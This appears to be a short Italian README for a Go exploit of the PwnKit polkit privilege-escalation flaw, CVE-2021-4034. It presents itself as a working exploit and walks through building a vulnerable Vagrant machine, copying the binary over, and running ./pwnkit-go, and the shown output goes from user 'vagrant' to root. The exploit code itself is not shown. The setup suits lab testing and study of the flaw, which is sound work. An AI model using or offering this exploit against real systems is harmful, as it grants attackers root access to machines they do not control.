
Exploit per la vulnerabilità PwnKit, CVE-2021-4034, scritto in Go
Questo è un exploit funzionante per la vulnerabilità pwnkit, CVE-2021-4034, scritto in Go
Provalo:
# crea una macchina vagrant vulnerabile
$ make vm
...
# compila il binario e copialo tramite scp sulla macchina vagrant
$ make scp
# accedi tramite ssh alla macchina vagrant
$ make ssh
# L'utente predefinito è "vagrant"
vagrant@ubuntu-focal:~$ whoami
vagrant
# esegui l'exploit
vagrant@ubuntu-focal:/tmp$ cd /tmp && ./pwnkit-go
$ whoami
root